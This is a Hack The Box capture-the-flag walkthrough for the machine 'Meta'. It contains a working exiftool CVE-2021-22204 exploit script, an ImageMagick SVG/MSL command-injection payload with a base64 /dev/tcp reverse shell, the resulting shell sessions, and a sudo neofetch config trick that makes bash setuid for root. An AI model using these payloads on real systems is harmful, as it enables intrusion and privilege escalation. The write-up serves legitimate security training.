Hack The Box - Meta

Meta is a medium rated machine on HackTheBox created by Nauten. For the user part we will abuse a CVE in exiftool to obtain a reverse shell on the machine. This will be followed up by another CVE inside ImageMagick which will give us a shell as another user. To escalate to root we will modify a config file for neofetch which we are able to run using sudo.

User

As usual we start our enumeration with a nmap scan against all ports followed by a script and version detection scan against the open ones to get an initial overview of the attack surface.

Nmap

All ports

$ sudo nmap -p- -n -T4 10.129.166.252
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-22 22:40 CET
Nmap scan report for 10.129.166.252
Host is up (0.027s latency).
Not shown: 65532 closed tcp ports (reset)
PORT      STATE    SERVICE
22/tcp    open     ssh
80/tcp    open     http

Nmap done: 1 IP address (1 host up) scanned in 529.64 seconds

Script and version

$ sudo nmap -sC -sV -p22,80 -n 10.129.166.252
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-22 22:52 CET
Nmap scan report for 10.129.166.252
Host is up (0.029s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 12:81:17:5a:5a:c9:c6:00:db:f0:ed:93:64:fd:1e:08 (RSA)
|   256 b5:e5:59:53:00:18:96:a6:f8:42:d8:c7:fb:13:20:49 (ECDSA)
|_  256 05:e9:df:71:b5:9f:25:03:6b:d0:46:8d:05:45:44:20 (ED25519)
80/tcp open  http    Apache httpd
|_http-server-header: Apache
|_http-title: Did not follow redirect to http://artcorp.htb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.73 seconds

Exfitool

The nmap scan leaks the hostname artcorp.htb so we add it to our /etc/hosts. Opening the page up in our browser it looks like a completly static webpage without much functionality.

Checking for additional vhosts using ffuf we are able to find dev01.artcorp.htb which we also add to our /etc/hosts.

$ ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H 'Host: FUZZ.artcorp.htb' -u http://10.129.166.252 -fs 0

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://10.129.166.252
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
 :: Header           : Host: FUZZ.artcorp.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
 :: Filter           : Response size: 0
________________________________________________

dev01                   [Status: 200, Size: 247, Words: 16, Lines: 10]

Going there we see a development page with only one application available.

Clicking on MetaView there is a file upload form which tells us to upload an image to display metadata.

Uploading a test jpg the output looks like straight from exiftool.

There has been a recent CVE(CVE-2021-22204)with remote code execution in exiftool. Using this PoC where we only have to adjust our ip address to tun0 and the port to where we want to catch the reverse shell we can generate an image that sends a python reverse shell back to our machine.

exploit.py

#!/bin/env python3

import base64
import subprocess

ip = '10.10.14.73'
port = '7575'

payload = b"(metadata \"\c${use MIME::Base64;eval(decode_base64('"


payload = payload + base64.b64encode( f"use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in({port},inet_aton('{ip}'))));".encode() )

payload = payload + b"'))};\")"


payload_file = open('payload', 'w')
payload_file.write(payload.decode('utf-8'))
payload_file.close()


subprocess.run(['bzz', 'payload', 'payload.bzz'])
subprocess.run(['djvumake', 'exploit.djvu', "INFO=1,1", 'BGjp=/dev/null', 'ANTz=payload.bzz'])
subprocess.run(['exiftool', '-config', 'configfile', '-HasselbladExif<=exploit.djvu', 'image.jpg'])

Running the script the image is getting updated with the payload.

$ python3 exploit.py
    1 image files updated

Now we just have to set up a listener on the port we specified and upload the generated image to the website.

$ nc -lnvp 7575
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::7575
Ncat: Listening on 0.0.0.0:7575

After we click the upload button the page hangs and we get a connection back on our ncat listener as www-data which we upgrade using python and fix the terminal size.

$ nc -lnvp 7575
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::7575
Ncat: Listening on 0.0.0.0:7575
Ncat: Connection from 10.129.166.252.
Ncat: Connection from 10.129.166.252:43968.
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@meta:/var/www/dev01.artcorp.htb/metaview$ export TERM=xterm
export TERM=xterm
www-data@meta:/var/www/dev01.artcorp.htb/metaview$ ^Z
[1]  + 43617 suspended  nc -lnvp 7575
$ stty raw -echo;fg
[1]  + 43617 continued  nc -lnvp 7575

www-data@meta:/var/www/dev01.artcorp.htb/metaview$

ImageMagick

Taking a look around on the system and monitoring for running processes there seems to be a cronjob being run by the user thomas who has the uid of 1000.

2022/01/22 17:13:01 CMD: UID=0    PID=1441   | /usr/sbin/CRON -f
2022/01/22 17:13:01 CMD: UID=1000 PID=1442   | /bin/bash /usr/local/bin/convert_images.sh
2022/01/22 17:13:01 CMD: UID=1000 PID=1444   | pkill mogrify

Checking the script it cd’s into the directory /var/www/dev01.artcorp.htb/convert_images and then calls /usr/local/bin/mogrify on all files machting *.* with an output format of png.

/usr/local/bin/convert_images.sh

#!/bin/bash
cd /var/www/dev01.artcorp.htb/convert_images/ && /usr/local/bin/mogrify -format png *.* 2>/dev/null
pkill mogrify

Taking a closer look at the mogrify it is actually a symlink to magick which is part of ImageMagick.

www-data@meta:/var/www/dev01.artcorp.htb/metaview$ ls -la /usr/local/bin/mogrify
lrwxrwxrwx 1 root root 6 Aug 29 15:59 /usr/local/bin/mogrify -> magick

To check for possible CVE’s in ImageMagick we need the version number first.

www-data@meta:/var/www/dev01.artcorp.htb/metaview$ mogrify --version
Version: ImageMagick 7.0.10-36 Q16 x86_64 2021-08-29 https://imagemagick.org
Copyright: © 1999-2020 ImageMagick Studio LLC
License: https://imagemagick.org/script/license.php
Features: Cipher DPC HDRI OpenMP(4.5)
Delegates (built-in): fontconfig freetype jng jpeg png x xml zlib

Looking the version up on google we are able to find a PoC which should work with the installed version of ImageMagick. The PoC abuses the the authentication mechanism for password protected PDF’s to pass additional shell commands. To abuse this we first we generate a base64 encoded reverse shell payload.

$ echo -n 'bash -c "bash -i >&/dev/tcp/10.10.14.73/7575 0>&1"' | base64
YmFzaCAtYyAiYmFzaCAtaSA+Ji9kZXYvdGNwLzEwLjEwLjE0LjczLzc1NzUgMD4mMSI=

We then take the poc.svg from the blogpost and exchange the payload with our reverse shell.

poc.svg

<image authenticate='ff" `echo -n YmFzaCAtYyAiYmFzaCAtaSA+Ji9kZXYvdGNwLzEwLjEwLjE0LjczLzc1NzUgMD4mMSI= | base64 -d | bash`;"'>
  <read filename="pdf:/etc/passwd"/>
  <get width="base-width" height="base-height" />
  <resize geometry="400x400" />
  <write filename="test.png" />
  <svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <image xlink:href="msl:poc.svg" height="100" width="100"/>
  </svg>
</image>

All we have to do now is to set up a ncat listener and to drop the file in the /var/www/dev01.artcorp.htb/convert_images on the target machine.

nc -lnvp 7575
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::7575
Ncat: Listening on 0.0.0.0:757

www-data@meta:/var/www/dev01.artcorp.htb/convert_images$ wget 10.10.14.73/poc.svg -O poc.svg
--2022-01-22 17:18:46--  http://10.10.14.73/poc.svg
Connecting to 10.10.14.73:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 475 [image/svg+xml]
Saving to: ‘poc.svg’

poc.svg                                                     100%[==========================================================================================================================================>]     475  --.-KB/s    in 0s

2022-01-22 17:18:46 (55.3 MB/s) - ‘poc.svg’ saved [475/475]

www-data@meta:/var/www/dev01.artcorp.htb/convert_images$ ls -la
total 12
drwxrwxr-x 2 root     www-data 4096 Jan 22 17:18 .
drwxr-xr-x 4 root     root     4096 Oct 18 14:27 ..
-rw-r--r-- 1 www-data www-data  475 Jan 22 15:08 poc.svg

After some time we get a connection back as thomas and are able to read the user flag.

$ nc -lnvp 7575
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::7575
Ncat: Listening on 0.0.0.0:7575
Ncat: Connection from 10.129.166.252.
Ncat: Connection from 10.129.166.252:43978.
bash: cannot set terminal process group (1533): Inappropriate ioctl for device
bash: no job control in this shell
thomas@meta:/var/www/dev01.artcorp.htb/convert_images$ python3 -c 'import pty;pty.spawn("/bin/bash")'
<ges$ python3 -c 'import pty;pty.spawn("/bin/bash")'
thomas@meta:/var/www/dev01.artcorp.htb/convert_images$ export TERM=xterm
export TERM=xterm
thomas@meta:/var/www/dev01.artcorp.htb/convert_images$ ^Z
[1]  + 45412 suspended  nc -lnvp 7575
$ stty raw -echo;fg
[1]  + 45412 continued  nc -lnvp 7575
                                                       ^C
thomas@meta:/var/www/dev01.artcorp.htb/convert_images$ stty rows 57 cols 239
thomas@meta:/var/www/dev01.artcorp.htb/convert_images$ wc -c ~/user.txt
33 /home/thomas/user.txt

Root

Checking for sudo permission thomas is able to run /usr/bin/neofetch as the root user. An interesting point here is the env_keep+=XDG_CONFIG_HOME flag for the sudoers entry. env_keep means that this environment variable will not be reset when calling sudo even though env_reset is present aswell.

thomas@meta:/var/www/dev01.artcorp.htb/convert_images$ sudo -l
Matching Defaults entries for thomas on meta:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, env_keep+=XDG_CONFIG_HOME

User thomas may run the following commands on meta:
    (root) NOPASSWD: /usr/bin/neofetch \"\"

To see what we can do with this we can look for the variable in the source code of neofetch. The variable is used to declare the configuration directory of neovim. The interesting thing here is that the configuration file for neoftech get’s sourced. This means that anything we put into the configuration file will be eventually executed setting the XDG_CONFIG_HOME.

/usr/bin/neofetch

#!/usr/bin/env bash
# vim: noai:ts=4:sw=4:expandtab
# shellcheck source=/dev/null
# shellcheck disable=2009
...[snip]...
version="6.0.0"

bash_version="${BASH_VERSION/.*}"
sys_locale="${LANG:-C}"
XDG_CONFIG_HOME="${XDG_CONFIG_HOME:-${HOME}/.config}"
PATH="${PATH}:/usr/xpg4/bin:/usr/sbin:/sbin:/usr/etc:/usr/libexec"

...[snip]...

get_user_config() {
    mkdir -p "${XDG_CONFIG_HOME}/neofetch/"

    # --config /path/to/config.conf
    if [[ -f "$config_file" ]]; then
        source "$config_file"
        err "Config: Sourced user config. (${config_file})"
        return

    elif [[ -f "${XDG_CONFIG_HOME}/neofetch/config.conf" ]]; then
        source "${XDG_CONFIG_HOME}/neofetch/config.conf"
        err "Config: Sourced user config.    (${XDG_CONFIG_HOME}/neofetch/config.conf)"

    elif [[ -f "${XDG_CONFIG_HOME}/neofetch/config" ]]; then
        source "${XDG_CONFIG_HOME}/neofetch/config"
        err "Config: Sourced user config.    (${XDG_CONFIG_HOME}/neofetch/config)"

    else
        config_file="${XDG_CONFIG_HOME}/neofetch/config.conf"

        # The config file doesn't exist, create it.
        printf '%s\n' "$config" > "$config_file"
    fi
}

...[snip]...

dynamic_prompt() {
    [[ $image_backend == off ]]   && { printf '\n'; return; }
    [[ $image_backend != ascii ]] && ((lines=(height + yoffset) / font_height + 1))
    [[ $image_backend == w3m ]] && ((lines=lines + padding / font_height + 1))

--
    [[ "$*" != *--config* ]] && get_user_config
...[snip]...

To abuse this we can simply append a command setting the suid bit on bash to the config file, export the XDG_CONFIG_HOME variable and run neofetch with sudo. Finally we can use the -p flag on bash to keep the suid permissions on our modified bash and add the root flag to our collection.

thomas@meta:/var/www/dev01.artcorp.htb/convert_images$ echo 'chmod +s /bin/bash' >> /home/thomas/.config/neofetch/config.conf; export XDG_CONFIG_HOME=/home/thomas/.config/; sudo /usr/bin/neofetch; bash -p
       _,met$$$$$gg.          root@meta
    ,g$$$$$$$$$$$$$$$P.       ---------
  ,g$$P"     """Y$$.".        OS: Debian GNU/Linux 10 (buster) x86_64
 ,$$P'              `$$$.     Host: VMware Virtual Platform None
',$$P       ,ggs.     `$$b:   Kernel: 4.19.0-17-amd64
`d$$'     ,$P"'   .    $$$    Uptime: 52 mins
 $$P      d$'     ,    $$P    Packages: 495 (dpkg)
 $$:      $$.   -    ,d$$'    Shell: bash 5.0.3
 $$;      Y$b._   _,d$P'      CPU: Intel Xeon Gold 5218 (2) @ 2.294GHz
 Y$$.    `.`"Y$$$$P"'         GPU: VMware SVGA II Adapter
 `$$b      "-.__              Memory: 154MiB / 1994MiB
  `Y$$
   `Y$$.
     `$$b.
       `Y$$b.
          `"Y$b._
              `"""

bash-5.0# id
uid=1000(thomas) gid=1000(thomas) euid=0(root) egid=0(root) groups=0(root),1000(thomas)
bash-5.0# wc -c /root/root.txt
33 /root/root.txt